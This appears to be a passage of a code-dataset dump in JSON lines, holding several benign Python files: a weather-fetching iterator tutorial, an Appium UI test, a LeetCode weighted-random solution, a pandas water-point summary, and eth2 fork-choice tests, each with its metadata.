"line_number": 24, "usage_type": "call"}, {"api_name": "reVX.utilities.utilities.log_versions", "line_number": 53, "usage_type": "call"}, {"api_name": "rex.utilities.loggers.log_mem", "line_number": 58, "usage_type": "call"}, {"api_name": "rex.utilities.utilities.check_res_file", "line_number": 113, "usage_type": "call"}, {"api_name": "reV.handlers.exclusions.ExclusionLayers", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 117, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 118, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.int8", "line_number": 121, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.uint32", "line_number": 124, "usage_type": "attribute"}, {"api_name": "rex.utilities.utilities.row_col_indices", "line_number": 130, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 160, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 225, "usage_type": "call"}, {"api_name": "geopandas.read_file", "line_number": 265, "usage_type": "call"}, {"api_name": "rex.utilities.utilities.parse_table", "line_number": 267, "usage_type": "call"}, {"api_name": "rex.utilities.utilities.get_lat_lon_cols", "line_number": 271, "usage_type": "call"}, {"api_name": "scipy.spatial.cKDTree", "line_number": 274, "usage_type": "call"}, {"api_name": "rex.utilities.utilities.get_lat_lon_cols", "line_number": 276, "usage_type": "call"}, {"api_name": "reVX.utilities.utilities.coordinate_distance", "line_number": 289, "usage_type": "call"}, {"api_name": "time.time", "line_number": 325, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 328, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 329, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 332, "usage_type": "call"}, {"api_name": "skimage.graph.MCP_Geometric", "line_number": 334, "usage_type": "call"}, {"api_name": "time.time", "line_number": 341, "usage_type": "call"}, {"api_name": "reVX.utilities.ExclusionsConverter.write_geotiff", "line_number": 350, "usage_type": "call"}, {"api_name": "reVX.utilities.ExclusionsConverter", "line_number": 350, "usage_type": "name"}, {"api_name": "os.cpu_count", "line_number": 373, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 375, "usage_type": "call"}, {"api_name": "os.path", "line_number": 375, "usage_type": "attribute"}, {"api_name": "rex.utilities.execution.SpawnProcessPool", "line_number": 380, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 386, "usage_type": "call"}, {"api_name": "os.path", "line_number": 386, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 387, "usage_type": "call"}, {"api_name": "os.path", "line_number": 387, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 392, "usage_type": "call"}, {"api_name": "concurrent.futures.as_completed", "line_number": 404, "usage_type": "call"}, {"api_name": "rex.utilities.loggers.log_mem", "line_number": 407, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 413, "usage_type": "call"}, {"api_name": "os.path", "line_number": 413, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 414, "usage_type": "call"}, {"api_name": "os.path", "line_number": 414, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 419, "usage_type": "call"}, {"api_name": "rex.utilities.loggers.log_mem", "line_number": 430, "usage_type": "call"}]} +{"seq_id": "474146757", "text": "#!/usr/bin/env python3\n# coding=utf-8\n# 抓取天气预报,实现用时访问的策略,即用迭代器,而不是简单的for,避免了占用大量内存,显示慢\n# for循环的本质就是先生成一个迭代对象,然后不断地调用next()\n# 下面的例子网站,点击后会自动下载一个文件,Json格式,用r.json()转换为python的字典格式\n# 要求:从网站抓取需要的城市气温信息,并依次显示;\n# 问题:如果一次抓取所有城市天气再显示,显示第一个城市气温时,有很高的延时,并且浪费存储空间;\n# 期望从‘用时访问’的策略,并且能把所有城市气温装到一个对象里,可用for语句进行迭代。如何实现?\n# 方案:\n# 把一个类作为一个迭代器使用 需要在类中实现两个方法 __iter__() 与 __next__() 。\n#  __iter__() 方法返回一个特殊的迭代器对象, 这个迭代器对象实现了 __next__() 方法并通过 StopIteration 异常标识迭代的完成。\n#  __next__() 方法(Python 2 里是 next())会返回下一个迭代器对象。\n\n# 这个例子可以取代34那个例子,我参考网上例子修改的\nimport requests\n\nclass WeatherIterator(object):\n def __init__(self, cities):\n self.cities = cities\n self.index = 0\n\n def __iter__(self):\n # 报错:Can't instantiate abstract class WeatherIterator with abstract methods __next__,\n # 即:不能用抽象的方法实例化抽象类WeatherIterator ——— 将next方法改为__next__()方法;\n return self\n\n def get_weather(self, city):\n r = requests.get(u'http://wthrcdn.etouch.cn/weather_mini?city=' + city)\n data = r.json()['data']['forecast'][0]\n return '%s: %s, %s' % (city, data['low'], data['high'])\n\n def __next__(self):\n if self.index == len(self.cities): # 迭代的结束条件必须有,否则就是死循环\n raise StopIteration\n # 正常迭代情况,即每次迭代出一个城市的气温信息;self.cities[self.index],得到需要的城市名字\n city = self.cities[self.index]\n self.index += 1\n return self.get_weather(city)\n\n\nif __name__ == '__main__':\n for x in WeatherIterator([u'北京', u'上海', u'广州', u'长春']):\n print(x)\n\n\n\n", "sub_path": "01_Python_Basics/40-iterator-class.py", "file_name": "40-iterator-class.py", "file_ext": "py", "file_size_in_byte": 2321, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.get", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "308099254", "text": "'''\r\nCreated on 2018年6月19日\r\n\r\n@author: admin\r\n'''\r\nimport unittest\r\nfrom PO import MenuPage\r\nfrom selenium import webdriver\r\nfrom appium import webdriver\r\nfrom Public import driver\r\nclass Test(unittest.TestCase):\r\n\r\n\r\n def setUp(self):\r\n self.driver=webdriver.Remote('http://127.0.0.1:4723/wd/hub',driver.MyDriver.desired_caps)\r\n\r\n\r\n def tearDown(self):\r\n self.driver.quit()\r\n\r\n\r\n def test_replay(self):\r\n menu=MenuPage.menu_page(self.driver)\r\n menu.click_menbtn()\r\n menu.click_replay()\r\n if menu.get_replay_title()=='回放 ':\r\n print(\"成功跳转回放页 :\"+menu.get_replay_title())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n #import sys;sys.argv = ['', 'Test.testName']\r\n unittest.main()", "sub_path": "Testcase/test_replay.py", "file_name": "test_replay.py", "file_ext": "py", "file_size_in_byte": 757, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "unittest.TestCase", "line_number": 11, "usage_type": "attribute"}, {"api_name": "appium.webdriver.Remote", "line_number": 15, "usage_type": "call"}, {"api_name": "appium.webdriver", "line_number": 15, "usage_type": "name"}, {"api_name": "Public.driver.MyDriver", "line_number": 15, "usage_type": "attribute"}, {"api_name": "Public.driver", "line_number": 15, "usage_type": "name"}, {"api_name": "PO.MenuPage.menu_page", "line_number": 23, "usage_type": "call"}, {"api_name": "PO.MenuPage", "line_number": 23, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "273781904", "text": "import random\nfrom typing import List\n\n\nclass Solution:\n\n def __init__(self, w: List[int]):\n self.arr = [0]\n for item in w:\n self.arr.append(self.arr[-1] + item)\n\n def pickIndex(self) -> int:\n x = random.random() * self.arr[-1]\n p1, p2 = 0, len(self.arr) - 1\n\n while p1 <= p2:\n mid = (p2 - p1) // 2 + p1\n if self.arr[mid] <= x < self.arr[mid + 1]:\n return mid\n elif self.arr[mid] > x:\n p2 = mid - 1\n else:\n p1 = mid + 1\n\n return -1\n\n\nif __name__ == \"__main__\":\n operations = [\"Solution\", \"pickIndex\", \"pickIndex\", \"pickIndex\", \"pickIndex\", \"pickIndex\"]\n values = [[[1, 3]], [1], [1], [1], [0], [1]]\n random.seed(10) # I've picked this randomly\n sol = None\n for op, v in zip(operations, values):\n if op == \"Solution\":\n sol = Solution(v[0])\n elif op == \"pickIndex\":\n print(sol.pickIndex(), '==', v[0])\n", "sub_path": "leetcode/p0528_random_pick_with_weight/my_attempt.py", "file_name": "my_attempt.py", "file_ext": "py", "file_size_in_byte": 1000, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "typing.List", "line_number": 7, "usage_type": "name"}, {"api_name": "random.random", "line_number": 13, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "38339006", "text": "import pandas as pd\nimport simplejson as json\n\ndef calculate(url):\n \"\"\"\n This function outlined below downloads and computes the aggregation of functional and non-functional water sources\n per community. The result is merged with the total number of functional water sources in all communities.\n Additionally, a ranking is based on the percentage of faulty water sources per community.\n \"\"\"\n df = pd.read_json(url)\n df = df[['water_functioning', 'communities_villages']]\n df = df.groupby(['communities_villages', 'water_functioning']).size().unstack()\n df = df.fillna(0)\n\n df['total'] = df['yes'] + df['no']\n df['fault_percentage'] = df['no'] / df['total']\n df['ranking'] = df['fault_percentage'].rank(ascending=False)\n\n total_functional = df['yes'].sum()\n df = df.rename(columns={'yes': 'functional', 'no':'non_functional'})\n df = df[['functional', 'non_functional', 'total', 'ranking']]\n records = df.to_json(orient='index')\n result = '{\"number_functional\": %s, \"communities\": %s}' % (total_functional, records)\n return json.loads(result)\n\n\ndata = calculate('https://raw.githubusercontent.com/onaio/ona-tech/master/data/water_points.json')\nprint(data['number_functional'])\nprint(data['communities'])\n\n\n\n\n", "sub_path": "solution.py", "file_name": "solution.py", "file_ext": "py", "file_size_in_byte": 1273, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.read_json", "line_number": 10, "usage_type": "call"}, {"api_name": "simplejson.loads", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "136363834", "text": "import random\n\nfrom eth_utils import to_dict\nfrom eth_utils.toolz import (\n first,\n keyfilter,\n merge,\n merge_with,\n partition,\n second,\n sliding_window,\n)\nimport pytest\n\nfrom eth2._utils import bitfield\nfrom eth2.beacon.committee_helpers import (\n get_committee_count_at_slot,\n get_committee_count_per_slot_at_epoch,\n iterate_committees_at_epoch,\n iterate_committees_at_slot,\n)\nfrom eth2.beacon.epoch_processing_helpers import get_attesting_indices\nfrom eth2.beacon.fork_choice.lmd_ghost import (\n Store,\n _balance_for_validator,\n lmd_ghost_scoring,\n score_block_by_root,\n)\nfrom eth2.beacon.helpers import compute_epoch_at_slot, compute_start_slot_at_epoch\nfrom eth2.beacon.types.attestation_data import AttestationData\nfrom eth2.beacon.types.attestations import Attestation\nfrom eth2.beacon.types.blocks import BeaconBlock\nfrom eth2.beacon.types.checkpoints import Checkpoint\n\n\n# TODO(ralexstokes) merge this and next into tools/builder\n@to_dict\ndef _mk_attestation_inputs_in_epoch(epoch, state, config):\n for committee, committee_index, slot in iterate_committees_at_epoch(\n state, epoch, config\n ):\n if not committee:\n # empty committee this slot\n continue\n\n attestation_data = AttestationData(\n slot=slot, index=committee_index, target=Checkpoint(epoch=epoch)\n )\n committee_size = len(committee)\n aggregation_bits = bitfield.get_empty_bitfield(committee_size)\n for index in range(committee_size):\n aggregation_bits = bitfield.set_voted(aggregation_bits, index)\n for index in committee:\n yield (\n index,\n (attestation_data.slot, (aggregation_bits, attestation_data)),\n )\n\n\ndef _mk_attestations_for_epoch_by_count(\n number_of_committee_samples, epoch, state, config\n):\n results = {}\n for _ in range(number_of_committee_samples):\n sample = _mk_attestation_inputs_in_epoch(epoch, state, config)\n results = merge(results, sample)\n return results\n\n\ndef _extract_attestations_from_index_keying(values):\n results = ()\n for value in values:\n aggregation_bits, data = second(value)\n attestation = Attestation(aggregation_bits=aggregation_bits, data=data)\n if attestation not in results:\n results += (attestation,)\n return results\n\n\ndef _keep_by_latest_slot(values):\n \"\"\"\n we get a sequence of (Slot, (Bitfield, AttestationData))\n and return the AttestationData with the highest slot\n \"\"\"\n return max(values, key=first)[1][1]\n\n\ndef _find_collision(state, config, validator_index, epoch):\n \"\"\"\n Given a target epoch, make the attestation expected for the\n validator w/ the given ``validator_index``.\n \"\"\"\n for committee, committee_index, slot in iterate_committees_at_epoch(\n state, epoch, config\n ):\n if validator_index in committee:\n # TODO(ralexstokes) refactor w/ tools/builder\n attestation_data = AttestationData(\n slot=slot, index=committee_index, target=Checkpoint(epoch=epoch)\n )\n committee_count = len(committee)\n aggregation_bits = bitfield.get_empty_bitfield(committee_count)\n for i in range(committee_count):\n aggregation_bits = bitfield.set_voted(aggregation_bits, i)\n\n return {\n index: (slot, (aggregation_bits, attestation_data))\n for index in committee\n }\n else:\n raise Exception(\"should have found a duplicate validator\")\n\n\ndef _introduce_collisions(all_attestations_by_index, state, config):\n \"\"\"\n Find some attestations for later epochs for the validators\n that are current attesting in each source of attestation.\n \"\"\"\n collisions = (all_attestations_by_index[0],)\n for src, dst in sliding_window(2, all_attestations_by_index):\n if not src:\n # src can be empty at low validator count\n collisions += (dst,)\n continue\n src_index = random.choice(list(src.keys()))\n src_val = src[src_index]\n src_slot, _ = src_val\n src_epoch = compute_epoch_at_slot(src_slot, config.SLOTS_PER_EPOCH)\n dst_epoch = src_epoch + 1\n\n collision = _find_collision(\n state, config, validator_index=src_index, epoch=dst_epoch\n )\n collisions += (merge(dst, collision),)\n return collisions\n\n\ndef _get_committee_count(state, epoch, config):\n return (\n get_committee_count_per_slot_at_epoch(\n state,\n epoch,\n config.MAX_COMMITTEES_PER_SLOT,\n config.SLOTS_PER_EPOCH,\n config.TARGET_COMMITTEE_SIZE,\n )\n * config.SLOTS_PER_EPOCH\n )\n\n\n@pytest.mark.parametrize(\n (\"validator_count\",),\n [\n (8,), # low number of validators\n (128,), # medium number of validators\n # NOTE: the test at 1024 count takes too long :(\n (256,), # high number of validators\n ],\n)\n@pytest.mark.parametrize((\"collisions_from_another_epoch\",), [(True,), (False,)])\ndef test_store_get_latest_attestation(\n genesis_state, empty_attestation_pool, config, collisions_from_another_epoch\n):\n \"\"\"\n Given some attestations across the various sources, can we\n find the latest ones for each validator?\n \"\"\"\n some_epoch = 3\n state = genesis_state.copy(\n slot=compute_start_slot_at_epoch(some_epoch, config.SLOTS_PER_EPOCH)\n )\n previous_epoch = state.previous_epoch(config.SLOTS_PER_EPOCH, config.GENESIS_EPOCH)\n previous_epoch_committee_count = _get_committee_count(state, previous_epoch, config)\n\n current_epoch = state.current_epoch(config.SLOTS_PER_EPOCH)\n current_epoch_committee_count = _get_committee_count(state, current_epoch, config)\n\n next_epoch = state.next_epoch(config.SLOTS_PER_EPOCH)\n next_epoch_committee_count = _get_committee_count(state, next_epoch, config)\n\n number_of_committee_samples = 4\n assert number_of_committee_samples <= previous_epoch_committee_count\n assert number_of_committee_samples <= current_epoch_committee_count\n assert number_of_committee_samples <= next_epoch_committee_count\n\n # prepare samples from previous epoch\n previous_epoch_attestations_by_index = _mk_attestations_for_epoch_by_count(\n number_of_committee_samples, previous_epoch, state, config\n )\n previous_epoch_attestations = _extract_attestations_from_index_keying(\n previous_epoch_attestations_by_index.values()\n )\n\n # prepare samples from current epoch\n current_epoch_attestations_by_index = _mk_attestations_for_epoch_by_count(\n number_of_committee_samples, current_epoch, state, config\n )\n current_epoch_attestations_by_index = keyfilter(\n lambda index: index not in previous_epoch_attestations_by_index,\n current_epoch_attestations_by_index,\n )\n current_epoch_attestations = _extract_attestations_from_index_keying(\n current_epoch_attestations_by_index.values()\n )\n\n # prepare samples for pool, taking half from the current epoch and half from the next epoch\n pool_attestations_in_current_epoch_by_index = _mk_attestations_for_epoch_by_count(\n number_of_committee_samples // 2, current_epoch, state, config\n )\n pool_attestations_in_next_epoch_by_index = _mk_attestations_for_epoch_by_count(\n number_of_committee_samples // 2, next_epoch, state, config\n )\n pool_attestations_by_index = merge(\n pool_attestations_in_current_epoch_by_index,\n pool_attestations_in_next_epoch_by_index,\n )\n pool_attestations_by_index = keyfilter(\n lambda index: (\n index not in previous_epoch_attestations_by_index\n or index not in current_epoch_attestations_by_index\n ),\n pool_attestations_by_index,\n )\n pool_attestations = _extract_attestations_from_index_keying(\n pool_attestations_by_index.values()\n )\n\n all_attestations_by_index = (\n previous_epoch_attestations_by_index,\n current_epoch_attestations_by_index,\n pool_attestations_by_index,\n )\n\n if collisions_from_another_epoch:\n (\n previous_epoch_attestations_by_index,\n current_epoch_attestations_by_index,\n pool_attestations_by_index,\n ) = _introduce_collisions(all_attestations_by_index, state, config)\n\n previous_epoch_attestations = _extract_attestations_from_index_keying(\n previous_epoch_attestations_by_index.values()\n )\n current_epoch_attestations = _extract_attestations_from_index_keying(\n current_epoch_attestations_by_index.values()\n )\n pool_attestations = _extract_attestations_from_index_keying(\n pool_attestations_by_index.values()\n )\n\n # build expected results\n expected_index = merge_with(\n _keep_by_latest_slot,\n previous_epoch_attestations_by_index,\n current_epoch_attestations_by_index,\n pool_attestations_by_index,\n )\n\n # ensure we get the expected results\n state = state.copy(\n previous_epoch_attestations=previous_epoch_attestations,\n current_epoch_attestations=current_epoch_attestations,\n )\n\n pool = empty_attestation_pool\n for attestation in pool_attestations:\n pool.add(attestation)\n\n chain_db = None # not relevant for this test\n store = Store(chain_db, state, pool, BeaconBlock, config)\n\n # sanity check\n assert expected_index.keys() == store._attestation_index.keys()\n\n for validator_index in range(len(state.validators)):\n expected_attestation_data = expected_index.get(validator_index, None)\n stored_attestation_data = store._get_latest_attestation(validator_index)\n assert expected_attestation_data == stored_attestation_data\n\n\ndef _mk_block(block_params, slot, parent, block_offset):\n return BeaconBlock(**block_params).copy(\n slot=slot,\n parent_root=parent.signing_root,\n # mix in something unique\n state_root=block_offset.to_bytes(32, byteorder=\"big\"),\n )\n\n\ndef _build_block_tree(\n block_params, root_block, base_slot, forking_descriptor, forking_asymmetry, config\n):\n \"\"\"\n build a block tree according to the data in ``forking_descriptor``, starting at\n the block with root ``base_root``.\n \"\"\"\n tree = [[root_block]]\n for slot_offset, block_count in enumerate(forking_descriptor):\n slot = base_slot + slot_offset\n blocks = []\n for parent in tree[-1]:\n if forking_asymmetry:\n if random.choice([True, False]):\n continue\n for block_offset in range(block_count):\n block = _mk_block(block_params, slot, parent, block_offset)\n blocks.append(block)\n tree.append(blocks)\n # other code written w/ expectation that root is not in the tree\n tree.pop(0)\n return tree\n\n\ndef _iter_block_tree_by_slot(tree):\n for level in tree:\n yield level\n\n\ndef _iter_block_level_by_block(level):\n for block in level:\n yield block\n\n\ndef _iter_block_tree_by_block(tree):\n for level in _iter_block_tree_by_slot(tree):\n for block in _iter_block_level_by_block(level):\n yield block\n\n\ndef _get_committees(state, target_slot, config, sampling_fraction):\n committees_per_slot = get_committee_count_at_slot(\n state,\n target_slot,\n config.MAX_COMMITTEES_PER_SLOT,\n config.SLOTS_PER_EPOCH,\n config.TARGET_COMMITTEE_SIZE,\n )\n committees_at_slot = ()\n for committee, _, _ in iterate_committees_at_slot(\n state, target_slot, committees_per_slot, config\n ):\n committees_at_slot += (committee,)\n return tuple(\n random.sample(\n committees_at_slot, int((sampling_fraction * committees_per_slot))\n )\n )\n\n\ndef _attach_committee_to_block(block, committee_and_index):\n block._committee_data = committee_and_index\n\n\ndef _get_committee_from_block(block):\n return getattr(block, \"_committee_data\", None)\n\n\ndef _attach_attestation_to_block(block, attestation):\n block._attestation = attestation\n\n\ndef _get_attestation_from_block(block):\n return getattr(block, \"_attestation\", None)\n\n\ndef _attach_committees_to_block_tree(\n state, block_tree, committees_by_slot, config, forking_asymmetry\n):\n for level, committees in zip(\n _iter_block_tree_by_slot(block_tree), committees_by_slot\n ):\n block_count = len(level)\n partitions = partition(block_count, committees)\n for committee_index, (block, committee) in enumerate(\n zip(_iter_block_level_by_block(level), partitions)\n ):\n if forking_asymmetry:\n if random.choice([True, False]):\n # random drop out\n continue\n _attach_committee_to_block(block, (first(committee), committee_index))\n\n\n# TODO(ralexstokes) merge in w/ tools/builder\ndef _mk_attestation_for_block_with_committee(block, committee, committee_index, config):\n committee_count = len(committee)\n aggregation_bits = bitfield.get_empty_bitfield(committee_count)\n for index in range(committee_count):\n aggregation_bits = bitfield.set_voted(aggregation_bits, index)\n\n attestation = Attestation(\n aggregation_bits=aggregation_bits,\n data=AttestationData(\n slot=block.slot,\n index=committee_index,\n beacon_block_root=block.signing_root,\n target=Checkpoint(\n epoch=compute_epoch_at_slot(block.slot, config.SLOTS_PER_EPOCH)\n ),\n ),\n )\n return attestation\n\n\ndef _attach_attestations_to_block_tree_with_committees(block_tree, config):\n for block in _iter_block_tree_by_block(block_tree):\n committee_data = _get_committee_from_block(block)\n if not committee_data:\n # w/ asymmetry in forking we may need to skip this step\n continue\n committee, committee_index = committee_data\n attestation = _mk_attestation_for_block_with_committee(\n block, committee, committee_index, config\n )\n _attach_attestation_to_block(block, attestation)\n\n\ndef _score_block(block, store, state, config):\n return sum(\n _balance_for_validator(state, validator_index)\n for validator_index, target in store._get_attestation_targets()\n if store._get_ancestor(target, block.slot) == block\n ) + score_block_by_root(block)\n\n\ndef _build_score_index_from_decorated_block_tree(block_tree, store, state, config):\n return {\n block.signing_root: _score_block(block, store, state, config)\n for block in _iter_block_tree_by_block(block_tree)\n }\n\n\ndef _iter_attestation_by_validator_index(state, attestation, config):\n for index in get_attesting_indices(\n state, attestation.data, attestation.aggregation_bits, config\n ):\n yield index\n\n\nclass _store:\n \"\"\"\n Mock Store class.\n \"\"\"\n\n def __init__(self, state, root_block, block_tree, attestation_pool, config):\n self._state = state\n self._block_tree = block_tree\n self._attestation_pool = attestation_pool\n self._config = config\n self._latest_attestations = self._find_attestation_targets()\n self._block_index = {\n block.signing_root: block for block in _iter_block_tree_by_block(block_tree)\n }\n self._block_index[root_block.signing_root] = root_block\n self._blocks_by_parent_root = {\n block.parent_root: self._block_index[block.parent_root]\n for block in _iter_block_tree_by_block(block_tree)\n }\n\n def _find_attestation_targets(self):\n result = {}\n for _, attestation in self._attestation_pool:\n target_slot = attestation.data.slot\n for validator_index in _iter_attestation_by_validator_index(\n self._state, attestation, self._config\n ):\n if validator_index in result:\n existing = result[validator_index]\n existing_slot = existing.data.slot\n if existing_slot > target_slot:\n continue\n result[validator_index] = attestation\n return result\n\n def _get_attestation_targets(self):\n for index, target in self._latest_attestations.items():\n yield (index, self._block_index[target.data.beacon_block_root])\n\n def _get_parent_block(self, block):\n return self._blocks_by_parent_root[block.parent_root]\n\n def _get_ancestor(self, block, slot):\n if block.slot == slot:\n return block\n elif block.slot < slot:\n return None\n else:\n return self._get_ancestor(self._get_parent_block(block), slot)\n\n\n@pytest.mark.parametrize(\n (\"validator_count\",),\n [\n (8,), # low number of validators\n (128,), # medium number of validators\n (1024,), # high number of validators\n ],\n)\n@pytest.mark.parametrize(\n (\n # controls how many children a parent has\n \"forking_descriptor\",\n ),\n [\n ((1,),),\n ((2,),),\n ((3,),),\n ((1, 1),),\n ((2, 1),),\n ((3, 2),),\n ((1, 4),),\n ((1, 2, 1),),\n ],\n)\n@pytest.mark.parametrize(\n (\n # controls how children should be allocated to a given parent\n \"forking_asymmetry\",\n ),\n [\n # Asymmetry means we may deviate from the description in ``forking_descriptor``.\n (True,),\n # No asymmetry means every parent has\n # the number of children prescribed in ``forking_descriptor``.\n # => randomly drop some blocks from receiving attestations\n (False,),\n ],\n)\ndef test_lmd_ghost_fork_choice_scoring(\n sample_beacon_block_params,\n chaindb_at_genesis,\n # see note below on how this is used\n fork_choice_scoring,\n forking_descriptor,\n forking_asymmetry,\n genesis_state,\n empty_attestation_pool,\n config,\n):\n \"\"\"\n Given some blocks and some attestations, can we score them correctly?\n \"\"\"\n chain_db = chaindb_at_genesis\n root_block = chain_db.get_canonical_head(BeaconBlock)\n\n some_epoch = 3\n some_slot_offset = 10\n\n state = genesis_state.copy(\n slot=compute_start_slot_at_epoch(some_epoch, config.SLOTS_PER_EPOCH)\n + some_slot_offset,\n current_justified_checkpoint=Checkpoint(\n epoch=some_epoch, root=root_block.signing_root\n ),\n )\n assert some_epoch >= state.current_justified_checkpoint.epoch\n\n # NOTE: the attestations have to be aligned to the blocks which start from ``base_slot``.\n base_slot = compute_start_slot_at_epoch(some_epoch, config.SLOTS_PER_EPOCH) + 1\n block_tree = _build_block_tree(\n sample_beacon_block_params,\n root_block,\n base_slot,\n forking_descriptor,\n forking_asymmetry,\n config,\n )\n\n slot_count = len(forking_descriptor)\n committee_sampling_fraction = 1\n committees_by_slot = tuple(\n _get_committees(\n state, base_slot + slot_offset, config, committee_sampling_fraction\n )\n for slot_offset in range(slot_count)\n )\n\n _attach_committees_to_block_tree(\n state, block_tree, committees_by_slot, config, forking_asymmetry\n )\n\n _attach_attestations_to_block_tree_with_committees(block_tree, config)\n\n attestations = tuple(\n _get_attestation_from_block(block)\n for block in _iter_block_tree_by_block(block_tree)\n if _get_attestation_from_block(block)\n )\n\n attestation_pool = empty_attestation_pool\n for attestation in attestations:\n attestation_pool.add(attestation)\n\n store = _store(state, root_block, block_tree, attestation_pool, config)\n\n score_index = _build_score_index_from_decorated_block_tree(\n block_tree, store, state, config\n )\n\n for block in _iter_block_tree_by_block(block_tree):\n # NOTE: we use the ``fork_choice_scoring`` fixture, it doesn't matter for this test\n chain_db.persist_block(block, BeaconBlock, fork_choice_scoring)\n\n scoring_fn = lmd_ghost_scoring(\n chain_db, attestation_pool, state, config, BeaconBlock\n )\n\n for block in _iter_block_tree_by_block(block_tree):\n score = scoring_fn(block)\n expected_score = score_index[block.signing_root]\n assert score == expected_score\n", "sub_path": "tests/eth2/core/beacon/fork_choice/test_lmd_ghost.py", "file_name": "test_lmd_ghost.py", "file_ext": "py", "file_size_in_byte": 20512, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "eth2.beacon.committee_helpers.iterate_committees_at_epoch", "line_number": 39, "usage_type": "call"}, {"api_name": "eth2.beacon.types.attestation_data.AttestationData", "line_number": 46, "usage_type": "call"}, {"api_name": "eth2.beacon.types.checkpoints.Checkpoint", "line_number": 47, "usage_type": "call"}, {"api_name": "eth2._utils.bitfield.get_empty_bitfield", "line_number": 50, "usage_type": "call"}, {"api_name": "eth2._utils.bitfield", "line_number": 50, "usage_type": "name"}, {"api_name": "eth2._utils.bitfield.set_voted", "line_number": 52, "usage_type": "call"}, {"api_name": "eth2._utils.bitfield", "line_number": 52, "usage_type": "name"}, {"api_name": "eth_utils.to_dict", "line_number": 37, "usage_type": "name"}, {"api_name": "eth_utils.toolz.merge", "line_number": 66, "usage_type": "call"}, {"api_name": "eth_utils.toolz.second", "line_number": 73, "usage_type": "call"}, {"api_name": "eth2.beacon.types.attestations.Attestation", "line_number": 74, "usage_type": "call"}, {"api_name": "eth_utils.toolz.first", "line_number": 85, "usage_type": "name"}, {"api_name": "eth2.beacon.committee_helpers.iterate_committees_at_epoch", "line_number": 93, "usage_type": "call"}, {"api_name": "eth2.beacon.types.attestation_data.AttestationData", "line_number": 98, "usage_type": "call"}, {"api_name": "eth2.beacon.types.checkpoints.Checkpoint", "line_number": 99, "usage_type": "call"}, {"api_name": "eth2._utils.bitfield.get_empty_bitfield", "line_number": 102, "usage_type": "call"}, {"api_name": "eth2._utils.bitfield", "line_number": 102, "usage_type": "name"}, {"api_name": "eth2._utils.bitfield.set_voted", "line_number": 104, "usage_type": "call"}, {"api_name": "eth2._utils.bitfield", "line_number": 104, "usage_type": "name"}, {"api_name": "eth_utils.toolz.sliding_window", "line_number": 120, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 125, "usage_type": "call"}, {"api_name": "eth2.beacon.helpers.compute_epoch_at_slot", "line_number": 128, "usage_type": "call"}, {"api_name": "eth_utils.toolz.merge", "line_number": 134, "usage_type": "call"}, {"api_name": "eth2.beacon.committee_helpers.get_committee_count_per_slot_at_epoch", "line_number": 140, "usage_type": "call"}, {"api_name": "eth2.beacon.helpers.compute_start_slot_at_epoch", "line_number": 170, "usage_type": "call"}, {"api_name": "eth_utils.toolz.keyfilter", "line_number": 198, "usage_type": "call"}, {"api_name": "eth_utils.toolz.merge", "line_number": 213, "usage_type": "call"}, {"api_name": "eth_utils.toolz.keyfilter", "line_number": 217, "usage_type": "call"}, {"api_name": "eth_utils.toolz.merge_with", "line_number": 252, "usage_type": "call"}, {"api_name": "eth2.beacon.fork_choice.lmd_ghost.Store", "line_number": 270, "usage_type": "call"}, {"api_name": "eth2.beacon.types.blocks.BeaconBlock", "line_number": 270, "usage_type": "argument"}, {"api_name": "pytest.mark.parametrize", "line_number": 151, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 151, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 160, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 160, "usage_type": "attribute"}, {"api_name": "eth2.beacon.types.blocks.BeaconBlock", "line_number": 282, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 303, "usage_type": "call"}, {"api_name": "eth2.beacon.committee_helpers.get_committee_count_at_slot", "line_number": 331, "usage_type": "call"}, {"api_name": "eth2.beacon.committee_helpers.iterate_committees_at_slot", "line_number": 339, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 344, "usage_type": "call"}, {"api_name": "eth_utils.toolz.partition", "line_number": 373, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 378, "usage_type": "call"}, {"api_name": "eth_utils.toolz.first", "line_number": 381, "usage_type": "call"}, {"api_name": "eth2._utils.bitfield.get_empty_bitfield", "line_number": 387, "usage_type": "call"}, {"api_name": "eth2._utils.bitfield", "line_number": 387, "usage_type": "name"}, {"api_name": 